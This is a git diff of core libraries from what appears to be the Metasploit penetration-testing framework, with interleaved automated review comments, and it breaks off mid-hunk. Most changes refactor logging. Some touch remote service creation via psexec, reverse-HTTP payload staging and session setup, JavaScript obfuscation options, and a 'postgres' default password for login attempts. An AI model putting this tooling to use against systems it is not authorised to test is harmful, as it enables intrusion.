386b6378f9..f25298c868 100644 --- a/lib/msf/core/exploit/http/wordpress/base.rb +++ b/lib/msf/core/exploit/http/wordpress/base.rb @@ -27,7 +27,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Base return res if res && res.code == 200 && res.body && wordpress_detect_regexes.any? { |r| res.body =~ r } return nil rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e - print_error("#{peer} - Error connecting to #{target_uri}: #{e}") + print_error("Error connecting to #{target_uri}: #{e}") return nil end end diff --git a/lib/msf/core/exploit/http/wordpress/helpers.rb b/lib/msf/core/exploit/http/wordpress/helpers.rb index a9b70dae79..206b0364c7 100644 --- a/lib/msf/core/exploit/http/wordpress/helpers.rb +++ b/lib/msf/core/exploit/http/wordpress/helpers.rb 
@@ -52,7 +52,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers if res && res.redirect? && res.redirection return wordpress_helper_parse_location_header(res) else - message = "#{peer} - Post comment failed." + message = "Post comment failed." message << " Status Code: #{res.code}" if res print_error(message) return nil @@ -67,7 +67,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Helpers # @return [Integer,nil] The post id, nil when nothing found def wordpress_helper_bruteforce_valid_post_id(range, comments_enabled=false, login_cookie=nil) range.each { |id| - vprint_status("#{peer} - Checking POST ID #{id}...") if (id % 100) == 0 + vprint_status("Checking POST ID #{id}...") if (id % 100) == 0 body = wordpress_helper_check_post_id(wordpress_url_post(id), comments_enabled, login_cookie) return id if body } diff --git a/lib/msf/core/exploit/http/wordpress/posts.rb b/lib/msf/core/exploit/http/wordpress/posts.rb index 57735bdf4a..ec0f52cff6 100644 --- a/lib/msf/core/exploit/http/wordpress/posts.rb +++ b/lib/msf/core/exploit/http/wordpress/posts.rb @@ -99,11 +99,11 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts # @param max_redirects [Integer] maximum redirects to follow # @return [Array,nil] String Array with valid blog posts, nil on error def wordpress_get_all_blog_posts_via_feed(max_redirects = 10) - vprint_status("#{peer} - Enumerating Blog posts...") + vprint_status("Enumerating Blog posts...") blog_posts = [] begin - vprint_status("#{peer} - Locating wordpress feed...") + vprint_status("Locating wordpress feed...") res = send_request_cgi({ 'uri' => wordpress_url_rss, 'method' => 'GET' 
@@ -116,26 +116,26 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts path = wordpress_helper_parse_location_header(res) return nil unless path - vprint_status("#{peer} - Web server returned a #{res.code}...following to #{path}") + vprint_status("Web server returned a #{res.code}...following to #{path}") res = send_request_cgi({ 'uri' => path, 'method' => 'GET' }) if res.code == 200 - vprint_status("#{peer} - Feed located at #{path}") + vprint_status("Feed located at #{path}") else - vprint_status("#{peer} - Returned a #{res.code}...") + vprint_status("Returned a #{res.code}...") end count = count - 1 end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_error("#{peer} - Unable to connect") + print_error("Unable to connect") return nil end if res.nil? or res.code != 200 - vprint_status("#{peer} - Did not recieve HTTP response for RSS feed") + vprint_status("Did not recieve HTTP response for RSS feed") return blog_posts end @@ -143,7 +143,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Posts links = res.body.scan(/([^<]+)<\/link>/i) if links.nil? or links.empty? - vprint_status("#{peer} - Feed did not have any links present") + vprint_status("Feed did not have any links present") return blog_posts end diff --git a/lib/msf/core/exploit/http/wordpress/users.rb b/lib/msf/core/exploit/http/wordpress/users.rb index 4ddac519ad..98fd963bc8 100644 --- a/lib/msf/core/exploit/http/wordpress/users.rb +++ b/lib/msf/core/exploit/http/wordpress/users.rb @@ -48,7 +48,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Users end if res.nil? - print_error("#{peer} - Error getting response.") + print_error("Error getting response.") return nil elsif res.code == 200 and ( diff --git a/lib/msf/core/exploit/http/wordpress/version.rb b/lib/msf/core/exploit/http/wordpress/version.rb index 80c693e56d..3561534b49 100644 --- a/lib/msf/core/exploit/http/wordpress/version.rb +++ b/lib/msf/core/exploit/http/wordpress/version.rb 
@@ -134,7 +134,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version res = nil readmes.each do |readme_name| readme_url = normalize_uri(target_uri.path, wp_content_dir, folder, name, readme_name) - vprint_status("#{peer} - Checking #{readme_url}") + vprint_status("Checking #{readme_url}") res = send_request_cgi( 'uri' => readme_url, 'method' => 'GET' @@ -180,7 +180,7 @@ module Msf::Exploit::Remote::HTTP::Wordpress::Version # Could not identify version number return Msf::Exploit::CheckCode::Detected if version.nil? - vprint_status("#{peer} - Found version #{version} of the #{item_type}") + vprint_status("Found version #{version} of the #{item_type}") if fixed_version.nil? if vuln_introduced_version.nil? diff --git a/lib/msf/core/exploit/jsobfu.rb b/lib/msf/core/exploit/jsobfu.rb index 4037df99d7..73b3ce2b47 100644 --- a/lib/msf/core/exploit/jsobfu.rb +++ b/lib/msf/core/exploit/jsobfu.rb @@ -8,7 +8,8 @@ module Msf def initialize(info={}) super register_advanced_options([ - OptInt.new('JsObfuscate', [false, "Number of times to obfuscate JavaScript", 0]) + OptInt.new('JsObfuscate', [false, "Number of times to obfuscate JavaScript", 0]), + OptString.new('JsIdentifiers', [false, "Identifiers to preserve for JsObfu"]) ], Exploit::JSObfu) end 
@@ -18,14 +19,20 @@ module Msf # @param js [String] JavaScript code # @param opts [Hash] obfuscation options # * :iterations [FixNum] Number of times to obfuscate + # * :preserved_identifiers [Array] An array of identifiers to preserve during obfuscation # @return [::Rex::Exploitation::JSObfu] # def js_obfuscate(js, opts={}) iterations = (opts[:iterations] || datastore['JsObfuscate']).to_i + identifiers = opts[:preserved_identifiers].blank? ? (datastore['JsIdentifiers'] || '').split(',') : opts[:preserved_identifiers] obfu = ::Rex::Exploitation::JSObfu.new(js) - obfu.obfuscate(:iterations=>iterations) + obfu_opts = {} + obfu_opts.merge!(iterations: iterations) + obfu_opts.merge!(preserved_identifiers: identifiers) + + obfu.obfuscate(obfu_opts) obfu end end -end \ No newline at end of file +end diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index ac7c718b7d..21808beede 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -116,3 +116,6 @@ require 'msf/core/exploit/http/jboss' # Kerberos Support require 'msf/core/exploit/kerberos/client' + +# Fortinet +require 'msf/core/exploit/fortinet' diff --git a/lib/msf/core/exploit/postgres.rb b/lib/msf/core/exploit/postgres.rb index 09f3f9487e..b6fc8d0706 100644 --- a/lib/msf/core/exploit/postgres.rb +++ b/lib/msf/core/exploit/postgres.rb 
@@ -32,7 +32,7 @@ module Exploit::Remote::Postgres Opt::RPORT(5432), OptString.new('DATABASE', [ true, 'The database to authenticate against', 'template1']), OptString.new('USERNAME', [ true, 'The username to authenticate as', 'postgres']), - OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', '']), + OptString.new('PASSWORD', [ false, 'The password for the specified username. Leave blank for a random password.', 'postgres']), OptBool.new('VERBOSE', [false, 'Enable verbose output', false]), OptString.new('SQL', [ false, 'The SQL query to execute', 'select version()']), OptBool.new('RETURN_ROWSET', [false, "Set to true to see query result sets", true]) @@ -292,6 +292,8 @@ module Exploit::Remote::Postgres when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user + when "Fauth.c:L285:Rauth_failed" ; return {:preauth => "9.4.1-5"} # Bad creds, good database + when "Fauth.c:L481:RClientAuthentication" ; return {:preauth => "9.4.1-5"} # bad user or host # Windows diff --git a/lib/msf/core/exploit/remote/browser_exploit_server.rb b/lib/msf/core/exploit/remote/browser_exploit_server.rb index 1ad7cffa70..466f03281c 100644 --- a/lib/msf/core/exploit/remote/browser_exploit_server.rb +++ b/lib/msf/core/exploit/remote/browser_exploit_server.rb @@ -7,6 +7,7 @@ require 'set' require 'rex/exploitation/js' require 'msf/core/exploit/jsobfu' require 'msf/core/exploit/remote/browser_profile_manager' +require 'msf/core/module' ### # 
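Review bot: The help text on the changed PASSWORD line still says `Leave blank for a random password.`, but the default is now `'postgres'`, so an untouched option no longer behaves as the description implies. The text should say that the default is a fixed value and that the option must be cleared explicitly to get the blank case, for example `'The password for the specified username. Clear this value for a random password.'`. Whether a blank value still has that effect is not visible in this hunk and should be confirmed before rewording.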
@@ -28,6 +29,8 @@ module Msf include Msf::Exploit::RopDb include Msf::Exploit::JSObfu include Msf::Exploit::Remote::BrowserProfileManager + include Msf::Module::UI::Line::Verbose + include Msf::Module::UI::Message::Verbose # this must be static between runs, otherwise the older cookies will be ignored DEFAULT_COOKIE_NAME = '__ua' @@ -136,7 +139,6 @@ module Msf clear_browser_profiles unless self.datastore['BrowserProfilePrefix'] end - # Returns the custom 404 URL set by the user # # @return [String] @@ -586,7 +588,7 @@ module Msf if profile.nil? print_status("Browsing directly to the exploit URL is forbidden.") send_not_found(cli) - elsif profile[:tried] and datastore['Retries'] == false + elsif profile[:tried] && !datastore['Retries'] print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.") send_not_found(cli) else diff --git a/lib/msf/core/exploit/smb/client.rb b/lib/msf/core/exploit/smb/client.rb index b104b9e48a..df006885f7 100644 --- a/lib/msf/core/exploit/smb/client.rb +++ b/lib/msf/core/exploit/smb/client.rb @@ -64,7 +64,7 @@ module Msf register_options( [ Opt::RHOST, - OptInt.new('RPORT', [ true, 'Set the SMB service port', 445]) + OptPort.new('RPORT', [ true, 'The SMB service port', 445]) ], Msf::Exploit::Remote::SMB::Client) register_autofilter_ports([ 139, 445]) diff --git a/lib/msf/core/exploit/smb/client/psexec.rb b/lib/msf/core/exploit/smb/client/psexec.rb index bd60e6c675..cb1acf684b 100644 --- a/lib/msf/core/exploit/smb/client/psexec.rb +++ b/lib/msf/core/exploit/smb/client/psexec.rb @@ -74,7 +74,7 @@ module Exploit::Remote::SMB::Client::Psexec simple.disconnect("\\\\#{host}\\#{smbshare}") return contents rescue Rex::Proto::SMB::Exceptions::ErrorCode => e - print_error("#{peer} - Unable to read file #{file}. #{e.class}: #{e}.") + print_error("Unable to read file #{file}. #{e.class}: #{e}.") return nil end end 
@@ -94,16 +94,16 @@ module Exploit::Remote::SMB::Client::Psexec def psexec(command, disconnect=true) simple.connect("\\\\#{datastore['RHOST']}\\IPC$") handle = dcerpc_handle('367abb81-9844-35f1-ad32-98f038001003', '2.0', 'ncacn_np', ["\\svcctl"]) - vprint_status("#{peer} - Binding to #{handle} ...") + vprint_status("Binding to #{handle} ...") dcerpc_bind(handle) - vprint_status("#{peer} - Bound to #{handle} ...") - vprint_status("#{peer} - Obtaining a service manager handle...") + vprint_status("Bound to #{handle} ...") + vprint_status("Obtaining a service manager handle...") svc_client = Rex::Proto::DCERPC::SVCCTL::Client.new(dcerpc) scm_handle, scm_status = svc_client.openscmanagerw(datastore['RHOST']) if scm_status == ERROR_ACCESS_DENIED - print_error("#{peer} - ERROR_ACCESS_DENIED opening the Service Manager") + print_error("ERROR_ACCESS_DENIED opening the Service Manager") end return false unless scm_handle 
@@ -114,68 +114,68 @@ module Exploit::Remote::SMB::Client::Psexec opts = {} end - vprint_status("#{peer} - Creating the service...") + vprint_status("Creating the service...") svc_handle, svc_status = svc_client.createservicew(scm_handle, service_name, display_name, command, opts) case svc_status when ERROR_SUCCESS - vprint_good("#{peer} - Successfully created the service") + vprint_good("Successfully created the service") when ERROR_SERVICE_EXISTS service_exists = true - print_warning("#{peer} - Service already exists, opening a handle...") + print_warning("Service already exists, opening a handle...") svc_handle = svc_client.openservicew(scm_handle, service_name) when ERROR_ACCESS_DENIED - print_error("#{peer} - Unable to create service, ACCESS_DENIED, did AV gobble your binary?") + print_error("Unable to create service, ACCESS_DENIED, did AV gobble your binary?") return false else - print_error("#{peer} - Failed to create service, ERROR_CODE: #{svc_status}") + print_error("Failed to create service, ERROR_CODE: #{svc_status}") return false end if svc_handle.nil? 
- print_error("#{peer} - No service handle retrieved") + print_error("No service handle retrieved") return false else if service_description - vprint_status("#{peer} - Changing service description...") + vprint_status("Changing service description...") svc_client.changeservicedescription(svc_handle, service_description) end - vprint_status("#{peer} - Starting the service...") + vprint_status("Starting the service...") begin svc_status = svc_client.startservice(svc_handle) case svc_status when ERROR_SUCCESS - print_good("#{peer} - Service started successfully...") + print_good("Service started successfully...") when ERROR_FILE_NOT_FOUND - print_error("#{peer} - Service failed to start - FILE_NOT_FOUND") + print_error("Service failed to start - FILE_NOT_FOUND") when ERROR_ACCESS_DENIED - print_error("#{peer} - Service failed to start - ACCESS_DENIED") + print_error("Service failed to start - ACCESS_DENIED") when ERROR_SERVICE_REQUEST_TIMEOUT - print_good("#{peer} - Service start timed out, OK if running a command or non-service executable...") + print_good("Service start timed out, OK if running a command or non-service executable...") else - print_error("#{peer} - Service failed to start, ERROR_CODE: #{svc_status}") + print_error("Service failed to start, ERROR_CODE: #{svc_status}") end ensure begin # If service already exists don't delete it! # Maybe we could have a force cleanup option..? 
if service_exists - print_warning("#{peer} - Not removing service as it already existed...") + print_warning("Not removing service as it already existed...") elsif datastore['SERVICE_PERSIST'] - print_warning("#{peer} - Not removing service for persistance...") + print_warning("Not removing service for persistance...") else - vprint_status("#{peer} - Removing the service...") + vprint_status("Removing the service...") svc_status = svc_client.deleteservice(svc_handle) if svc_status == ERROR_SUCCESS - vprint_good("#{peer} - Successfully removed the sevice") + vprint_good("Successfully removed the sevice") else - print_error("#{peer} - Unable to remove the service, ERROR_CODE: #{svc_status}") + print_error("Unable to remove the service, ERROR_CODE: #{svc_status}") end end ensure - vprint_status("#{peer} - Closing service handle...") + vprint_status("Closing service handle...") svc_client.closehandle(svc_handle) end end @@ -189,10 +189,6 @@ module Exploit::Remote::SMB::Client::Psexec true end - def peer - "#{rhost}:#{rport}" - end - end end diff --git a/lib/msf/core/exploit/smb/server/share.rb b/lib/msf/core/exploit/smb/server/share.rb index 1ddbdd4172..df5f43aca6 100644 --- a/lib/msf/core/exploit/smb/server/share.rb +++ b/lib/msf/core/exploit/smb/server/share.rb @@ -17,7 +17,7 @@ module Msf # @example Use it from an Auxiliary module # require 'msf/core' # - # class Metasploit3 < Msf::Auxiliary + # class MetasploitModule < Msf::Auxiliary # # include Msf::Exploit::Remote::SMB::Server::Share # @@ -59,7 +59,7 @@ module Msf # @example Use it from an Exploit module # require 'msf/core' # - # class Metasploit3 < Msf::Exploit::Remote + # class MetasploitModule < Msf::Exploit::Remote # Rank = ExcellentRanking # # include Msf::Exploit::EXE diff --git a/lib/msf/core/exploit/smtp_deliver.rb b/lib/msf/core/exploit/smtp_deliver.rb index a4900e8b1c..9ff8693723 100644 --- a/lib/msf/core/exploit/smtp_deliver.rb +++ b/lib/msf/core/exploit/smtp_deliver.rb 
@@ -71,7 +71,7 @@ module Exploit::Remote::SMTPDeliver # This method currently only knows about PLAIN authentication. # def connect_login(global = true) - print_verbose("Connecting to SMTP server #{rhost}:#{rport}...") + vprint_status("Connecting to SMTP server #{rhost}:#{rport}...") nsock = connect(global) if datastore['DOMAIN'] and not datastore['DOMAIN'] == '' @@ -114,7 +114,7 @@ module Exploit::Remote::SMTPDeliver else if datastore['PASSWORD'] and datastore["USERNAME"] and not datastore["USERNAME"].empty? # Let the user know their creds are going unused - print_verbose("Server didn't ask for authentication, skipping") + vprint_status("Server didn't ask for authentication, skipping") end end end @@ -170,7 +170,7 @@ module Exploit::Remote::SMTPDeliver end if not already_connected - print_verbose("Closing the connection...") + vprint_status("Closing the connection...") disconnect(nsock) end @@ -187,11 +187,11 @@ module Exploit::Remote::SMTPDeliver return false if not nsock if cmd =~ /AUTH PLAIN/ # Don't print the user's plaintext password - print_verbose("C: AUTH PLAIN ...") + vprint_status("C: AUTH PLAIN ...") else # Truncate because this will include a full email and we don't want # to dump it all. - print_verbose("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") + vprint_status("C: #{((cmd.length > 120) ? cmd[0,120] + "..." : cmd).strip}") end nsock.put(cmd) @@ -199,17 +199,11 @@ module Exploit::Remote::SMTPDeliver # Don't truncate the server output because it might be helpful for # debugging. - print_verbose("S: #{res.strip}") if res + vprint_status("S: #{res.strip}") if res return res end - def print_verbose(msg) - if datastore['VERBOSE'] - print_status(msg) - end - end - # The banner received after the initial connection to the server. This should look something like: # 220 mx.google.com ESMTP s5sm3837150wak.12 diff --git a/lib/msf/core/exploit/sunrpc.rb b/lib/msf/core/exploit/sunrpc.rb index f8c9055f30..265bea4ac5 100644 
--- a/lib/msf/core/exploit/sunrpc.rb +++ b/lib/msf/core/exploit/sunrpc.rb @@ -31,7 +31,7 @@ module Exploit::Remote::SunRPC register_evasion_options( [ - OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', 'false']), + OptBool.new('ONCRPC::tcp_request_fragmentation', [false, 'Enable fragmentation of TCP ONC/RPC requests', false]), ], Msf::Exploit::Remote::SunRPC ) @@ -65,7 +65,7 @@ module Exploit::Remote::SunRPC } ) - if datastore['ONCRPC::tcp_request_fragmentation'] == true + if datastore['ONCRPC::tcp_request_fragmentation'] self.rpcobj.should_fragment = 1 end diff --git a/lib/msf/core/exploit/tcp.rb b/lib/msf/core/exploit/tcp.rb index 59577e7932..ec70f4ff4a 100644 --- a/lib/msf/core/exploit/tcp.rb +++ b/lib/msf/core/exploit/tcp.rb @@ -64,7 +64,7 @@ module Exploit::Remote::Tcp register_advanced_options( [ OptBool.new('SSL', [ false, 'Negotiate SSL/TLS for outgoing connections', false]), - OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL/TLS to be used (TLS and SSL23 are auto-negotiate)', 'TLS1', ['SSL2', 'SSL3', 'SSL23', 'TLS', 'TLS1', 'TLS1.1', 'TLS1.2']]), + Opt::SSLVersion, OptEnum.new('SSLVerifyMode', [ false, 'SSL verification method', 'PEER', %W{CLIENT_ONCE FAIL_IF_NO_PEER_CERT NONE PEER}]), OptString.new('SSLCipher', [ false, 'String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"']), Opt::Proxies, @@ -82,11 +82,6 @@ module Exploit::Remote::Tcp ) end - # Returns the rhost:rport - def peer - "#{rhost}:#{rport}" - end - # # Establishes a TCP connection to the specified RHOST/RPORT # @@ -200,6 +195,14 @@ module Exploit::Remote::Tcp disconnect end + def print_prefix + if rhost + super + peer + " - " + else + super + end + end + ## # # Wrappers for getters 
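Review bot: The new `print_prefix` in tcp.rb is gated on `rhost` alone, while `peer` interpolates both `rhost` and `rport`, so a module with RHOST set and no RPORT would print a prefix like `host: - `; testing both (`if rhost && rport`) avoids that. Any caller outside this diff that still builds its message with `#{peer} - ` will now show the address twice, so the remaining call sites are worth a search. The method also has no comment, unlike the getters below it; something like `# Prepends "rhost:rport - " to every print_* message when RHOST is set` would match the file's style.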
@@ -207,17 +210,24 @@ module Exploit::Remote::Tcp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the TCP connection timeout # - def rport - datastore['RPORT'] + def connect_timeout + datastore['ConnectTimeout'] + end + + # + # Returns the local port for outgoing connections + # + def cport + datastore['CPORT'] end # @@ -234,18 +244,30 @@ module Exploit::Remote::Tcp datastore['LPORT'] end - # - # Returns the local host for outgoing connections - # - def chost - datastore['CHOST'] + # Returns the rhost:rport + def peer + "#{rhost}:#{rport}" end # - # Returns the local port for outgoing connections + # Returns the proxy configuration # - def cport - datastore['CPORT'] + def proxies + datastore['Proxies'] + end + + # + # Returns the target host + # + def rhost + datastore['RHOST'] + end + + # + # Returns the remote port + # + def rport + datastore['RPORT'] end # @@ -262,20 +284,6 @@ module Exploit::Remote::Tcp datastore['SSLVersion'] end - # - # Returns the proxy configuration - # - def proxies - datastore['Proxies'] - end - - # - # Returns the TCP connection timeout - # - def connect_timeout - datastore['ConnectTimeout'] - end - # # Returns the SSL certification verification mechanism # diff --git a/lib/msf/core/exploit/tcp_server.rb b/lib/msf/core/exploit/tcp_server.rb index a86a7a2b25..b791465dfd 100644 --- a/lib/msf/core/exploit/tcp_server.rb +++ b/lib/msf/core/exploit/tcp_server.rb 
@@ -19,7 +19,6 @@ module Exploit::Remote::TcpServer [ OptBool.new('SSL', [ false, 'Negotiate SSL for incoming connections', false]), # SSLVersion is currently unsupported for TCP servers (only supported by clients at the moment) - # OptEnum.new('SSLVersion', [ false, 'Specify the version of SSL that should be used', 'TLS1', ['SSL2', 'SSL3', 'TLS1']]), OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), OptAddress.new('SRVHOST', [ true, "The local host to listen on. This must be an address on the local machine or 0.0.0.0", '0.0.0.0' ]), OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]), diff --git a/lib/msf/core/exploit/udp.rb b/lib/msf/core/exploit/udp.rb index 2a7eedce31..8b503dc4cd 100644 --- a/lib/msf/core/exploit/udp.rb +++ b/lib/msf/core/exploit/udp.rb @@ -107,17 +107,17 @@ module Exploit::Remote::Udp ## # - # Returns the target host + # Returns the local host for outgoing connections # - def rhost - datastore['RHOST'] + def chost + datastore['CHOST'] end # - # Returns the remote port + # Returns the local port for outgoing connections # - def rport - datastore['RPORT'] + def cport + datastore['CPORT'] end # @@ -135,20 +135,19 @@ module Exploit::Remote::Udp end # - # Returns the local host for outgoing connections + # Returns the target host # - def chost - datastore['CHOST'] + def rhost + datastore['RHOST'] end # - # Returns the local port for outgoing connections + # Returns the remote port # - def cport - datastore['CPORT'] + def rport + datastore['RPORT'] end - protected attr_accessor :udp_sock diff --git a/lib/msf/core/framework.rb b/lib/msf/core/framework.rb index c8fd5db9cb..b8e797c8ec 100644 --- a/lib/msf/core/framework.rb +++ b/lib/msf/core/framework.rb 
@@ -38,14 +38,6 @@ class Framework Revision = "$Revision$" - # Repository information - RepoRevision = ::Msf::Util::SVN.revision - RepoUpdated = ::Msf::Util::SVN.updated - RepoUpdatedDays = ::Msf::Util::SVN.days_since_update - RepoUpdatedDaysNote = ::Msf::Util::SVN.last_updated_friendly - RepoUpdatedDate = ::Msf::Util::SVN.last_updated_date - RepoRoot = ::Msf::Util::SVN.root - # EICAR canary EICARCorrupted = ::Msf::Util::EXE.is_eicar_corrupted? diff --git a/lib/msf/core/handler.rb b/lib/msf/core/handler.rb index eafe12f97f..2ed2842ba8 100644 --- a/lib/msf/core/handler.rb +++ b/lib/msf/core/handler.rb @@ -163,6 +163,14 @@ module Handler return session end + # + # Interrupts a wait_for_session call by notifying with a nil event + # + def interrupt_wait_for_session + return unless session_waiter_event + session_waiter_event.notify(nil) + end + # # Set by the exploit module to configure handler # diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index e3d8b04ef5..d7380d2d2d 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb 
@@ -63,24 +63,19 @@ module ReverseHttp ], Msf::Handler::ReverseHttp) end - # Determine where to bind the server - # - # @return [String] - def listener_address - if datastore['ReverseListenerBindAddress'].to_s == '' - bindaddr = Rex::Socket.is_ipv6?(datastore['LHOST']) ? '::' : '0.0.0.0' + def print_prefix + if Thread.current[:cli] + super + "#{listener_uri} handling request from #{Thread.current[:cli].peerhost}; (UUID: #{uuid.to_s}) " else - bindaddr = datastore['ReverseListenerBindAddress'] + super end - - bindaddr end # Return a URI suitable for placing in a payload # # @return [String] A URI of the form +scheme://host:port/+ - def listener_uri - uri_host = Rex::Socket.is_ipv6?(listener_address) ? "[#{listener_address}]" : listener_address + def listener_uri(addr=datastore['LHOST']) + uri_host = Rex::Socket.is_ipv6?(addr) ? "[#{addr}]" : addr "#{scheme}://#{uri_host}:#{bind_port}/" end @@ -129,20 +124,33 @@ module ReverseHttp # def setup_handler + local_addr = nil local_port = bind_port + ex = false # Start the HTTPS server service on this host/port - self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, - local_port, - listener_address, - ssl?, - { - 'Msf' => framework, - 'MsfExploit' => self, - }, - nil, - (ssl?) ? datastore['HandlerSSLCert'] : nil - ) + bind_addresses.each do |ip| + begin + self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, + local_port, ip, ssl?, + { + 'Msf' => framework, + 'MsfExploit' => self, + }, + nil, + (ssl?) ? datastore['HandlerSSLCert'] : nil + ) + local_addr = ip + rescue + ex = $! + print_error("Handler failed to bind to #{ip}:#{local_port}") + else + ex = false + break + end + end + + raise ex if (ex) self.service.server_name = datastore['MeterpreterServerName'] 
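Review bot: In the new `print_prefix` of reverse_http.rb, `uuid` is resolved as a method on the handler, not as the per-request value, because the payload UUID is a local assigned inside `on_request` (`uuid = info[:uuid] || Msf::Payload::UUID.new`, visible in a later hunk). Unless a `uuid` reader returning the request's UUID exists outside this diff, the logged `(UUID: ...)` will not identify the connecting payload, and the messages it replaces also carried `cli.peerport`, which is now dropped. `listener_uri` is called here without an argument, so the prefix shows the LHOST-based URI, not the address actually bound in `setup_handler`. Storing the request UUID next to the client in `on_request` (for example `Thread.current[:cli_uuid] = uuid`) and reading it here would keep the log lines attributable.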
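Review bot: The bind loop in `setup_handler` uses a bare `rescue` with `$!` and prints only `Handler failed to bind to #{ip}:#{local_port}`, so the reason for a failure is lost for every address except the last one that is re-raised. Naming the exception keeps the cause in the output: `rescue ::StandardError => e`, then `ex = e` and `print_error("Handler failed to bind to #{ip}:#{local_port}: #{e.message}")`. If `bind_addresses` (defined outside this hunk) can return an empty list, `self.service` stays nil and the following `self.service.server_name =` line fails with an unrelated NoMethodError, so an explicit check before the loop would give a clearer error.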
@@ -156,7 +164,7 @@ module ReverseHttp }, 'VirtualDirectory' => true) - print_status("Started #{scheme.upcase} reverse handler on #{listener_uri}") + print_status("Started #{scheme.upcase} reverse handler on #{listener_uri(local_addr)}") lookup_proxy_settings if datastore['IgnoreUnknownPayloads'] @@ -224,6 +232,7 @@ protected # Parses the HTTPS request # def on_request(cli, req, obj) + Thread.current[:cli] = cli resp = Rex::Proto::Http::Response.new info = process_uri_resource(req.relative_resource) uuid = info[:uuid] || Msf::Payload::UUID.new @@ -241,7 +250,7 @@ protected # Validate known UUIDs for all requests if IgnoreUnknownPayloads is set if datastore['IgnoreUnknownPayloads'] && ! framework.uuid_db[uuid.puid_hex] - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Ignoring unknown UUID: #{request_summary}") + print_status("Ignoring unknown UUID: #{request_summary}") info[:mode] = :unknown_uuid end @@ -249,7 +258,7 @@ protected if datastore['IgnoreUnknownPayloads'] && info[:mode].to_s =~ /^init_/ allowed_urls = framework.uuid_db[uuid.puid_hex]['urls'] || [] unless allowed_urls.include?(req.relative_resource) - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Ignoring unknown UUID URL: #{request_summary}") + print_status("Ignoring unknown UUID URL: #{request_summary}") info[:mode] = :unknown_uuid_url end end @@ -259,7 +268,7 @@ protected # Process the requested resource. case info[:mode] when :init_connect - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Redirecting stageless connection from #{request_summary}") + print_status("Redirecting stageless connection from #{request_summary}") # Handle the case where stageless payloads call in on the same URI when they # first connect. From there, we tell them to callback on a connect URI that 
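Review bot: `Thread.current[:cli] = cli` at the top of `on_request` is never reset, so if the HTTP server reuses the thread, a message printed later outside a request would still carry the previous client's address in its prefix. Resetting it in an `ensure` clause (`Thread.current[:cli] = nil`) confines the value to the request being handled. `on_request` continues past this hunk, so the `ensure` has to enclose the whole method body, including the early `return` added in the `:init_native` branch.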
@@ -272,7 +281,7 @@ protected resp.body = pkt.to_r when :init_python - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Python payload ...") + print_status("Staging Python payload ...") url = payload_uri(req) + conn_id + '/' blob = "" @@ -301,7 +310,7 @@ protected }) when :init_java - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Java payload ...") + print_status("Staging Java payload ...") url = payload_uri(req) + conn_id + "/\x00" blob = obj.generate_stage( 
@@ -325,38 +334,43 @@ protected }) when :init_native - print_status("#{cli.peerhost}:#{cli.peerport} (UUID: #{uuid.to_s}) Staging Native payload ...") + print_status("Staging Native payload ...") url = payload_uri(req) + conn_id + "/\x00" uri = URI(payload_uri(req) + conn_id) resp['Content-Type'] = 'application/octet-stream' - # generate the stage, but pass in the existing UUID and connection id so that - # we don't get new ones generated. - blob = obj.stage_payload( - uuid: uuid, - uri: conn_id, - lhost: uri.host, - lport: uri.port - ) + begin + # generate the stage, but pass in the existing UUID and connection id so that + # we don't get new ones generated. + blob = obj.stage_payload( + uuid: uuid, + uri: conn_id, + lhost: uri.host, + lport: uri.port + ) - resp.body = encode_stage(blob) + resp.body = encode_stage(blob) - # Short-circuit the payload's handle_connection processing for create_session - create_session(cli, { - :passive_dispatcher => obj.service, - :conn_id => conn_id, - :url => url, - :expiration => datastore['SessionExpirationTimeout'].to_i, - :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, - :retry_total => datastore['SessionRetryTotal'].to_i, - :retry_wait => datastore['SessionRetryWait'].to_i, - :ssl => ssl?, - :payload_uuid => uuid - }) + # Short-circuit the payload's handle_connection processing for create_session + create_session(cli, { + :passive_dispatcher => obj.service, + :conn_id => conn_id, + :url => url, + :expiration => datastore['SessionExpirationTimeout'].to_i, + :comm_timeout => datastore['SessionCommunicationTimeout'].to_i, + :retry_total => datastore['SessionRetryTotal'].to_i, + :retry_wait => 